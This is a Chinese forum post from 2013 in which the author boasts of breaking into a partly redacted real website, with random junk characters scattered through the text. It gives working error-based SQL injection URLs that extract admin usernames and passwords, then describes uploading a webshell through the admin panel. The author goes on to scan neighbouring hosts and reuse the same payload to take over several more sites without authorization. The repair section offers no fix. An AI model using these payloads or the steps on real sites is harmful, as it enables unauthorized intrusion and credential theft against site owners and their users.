发现一个注入点4 [$ l& T* a; T" L' s
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
( E; [* w t* f. g+ y* Z4 B' y5 t$ D; d
习惯性的加’having1=1--2 c: `5 g2 r t2 P1 {/ V
+ ~9 t+ T0 G7 R7 ?6 V: C: h/ Y
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
7 C; X) @" @4 [5 s4 J/ p/ L& z4 \7 W5 c
0. G3 @6 k6 ^- X% x
8 U6 w& O9 G8 |" A9 }3 T5 y
爆出Diary_A.dl_Title(这时候很激动啊)
% D/ k$ P4 _. [' K3 y! S6 z: F7 y" p6 L2 K0 |) V4 ?5 k$ n
那么继续
7 L! W, {+ Q7 Y% K# ]http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
0 X( G' s, C* T% r; h! u
) B' z/ c" ]; M( B" a9 `继续,一直爆下去
8 v( o9 ]6 n* R: r/ s# e. U
3 ]+ [+ P# j9 |" v+ f! {! o爆到几个字段和表段 但是没找到需要的管理用户的字段
7 R( V' n5 q* Q, o) i- ]+ k, O) |
蛋疼了 怎么办 然后去后台登陆页看源码
& [ x) e" b2 z' m% k
# l4 m! E3 P# s( r) b# t9 b0
, _( O3 ?) Q" q4 c0 D" _$ x7 N1 ~
* n( j5 I# ]6 z$ x1 C( L7 p' [Input name= “ADUID”# Z1 I* p% C3 d/ _, h
Input name= “ADPWD”
6 w" r8 @7 J- F5 x
5 }) P8 M# Z8 F7 v) H很幸运 找到了字段那就继续
& f& h" i+ [: t3 x找到之后开始爆用户
! O- X4 N9 A% ~/ f: X7 `: @- qhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
( ?. \0 S: x9 P0 ^2 z" z爆密码
8 [* `9 U1 } e, Q8 e3 @! Ihttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—8 W. V$ r* U E8 X w1 p0 e
测试了下 这个注入点只能爆到文章哪里的表 5 L" f. c% Y& x
) l" ?% o" ^2 o( h, z头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了9 x ]1 n6 k9 d0 k5 b V
+ m5 J+ p& K1 g又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了* v3 N9 ?! ^& f' k$ P
! i" `: f- j4 P9 f+ ]. W
4735 v" V! t0 o5 D6 p$ L
1 g) o3 F, ]. l! v- {' ^% D/ s [( E
进后台
; U* y7 ^! K& H: b- E' h& U7 p% |. y! O) j6 [+ p
E5 F7 U- p J3 L发现几个上传点 有的地方不能上传 而且防止恶意代码2 U O+ g4 E. i$ u8 u1 U
% C; v6 o5 }* b- V' I' C; u# ]# M
没办法 各种百度各种找大牛 找到一只好像可以突破的马! ~* F& c7 L3 A. l5 w+ Y/ K U
/ i3 F- ?* L" |9 `: W# N# Y5 p7 C1 M
在系统管理那里直接上传 不过没有显示地址5 X' j9 v7 j B, c! E
o* c% Z) T4 i/ V再上传一次 抓包 搞定OK
2 t/ u6 Z! H! b4 [" _! |0 G- X; h" l; u* o
8 e& G/ C I8 }, u
; f! P V! j, E. p) q" L
472+ U o4 N4 Q, c5 b9 a* m5 M
' [3 F o6 L! P( E' a8 i
晚上不行了 去睡觉。。。+ E- D" D% H2 @ e9 \+ j* R
第二天刚起床 闲的没事做继续日站吧 ) }3 w" Q9 }0 J% @6 j1 |. P* t
" ~; U' D2 R" v找个站 就把这个站的旁c扫了下1 ?5 v0 N, |# R4 ]" q
# V0 ?) i1 P& d$ h) ?) v, s
发现c段也有一个购物站 ,然后还和这个站的模板差不多3 H- g, p) ~3 Q/ \, h1 f* S2 W
& Q% J9 |1 o0 U- f- ^0 E0 i+ w就找到会员登录口测试
6 d' c- f! a6 d7 H# W3 \0 M' [5 Y* }
'and (select top 1 MGR_UID from A_MGR)>0—
& f9 n' u7 X+ p0 K$ \9 h1 v. @果断爆到了 这时候我很激动 通杀
, @0 z- }) N0 Z: J
; p! O$ j0 F* p3 U8 z6 Y1 D再次翻c段( w$ p7 D k: k. l1 u2 a/ K
8 t: U% Q; G, o- h
翻出几个站 都成功拿下
: K! K& r) m! d
) C. F1 \+ \* @/ }- W4 R0 _ l3 A: L
& K1 D! A* Y* f, D修复方案:
7 _6 T- n9 V; m他们比我专业
5 l# V: B5 c+ ?1 W8 ? X: F4 _% m, u& s: ~4 a q3 a' [
1 z/ K7 X0 |$ I a% E5 p1 Y# b4 w5 ~$ M* W4 V
|
发表于 2013-4-4 17:40:38
收藏
支持
反对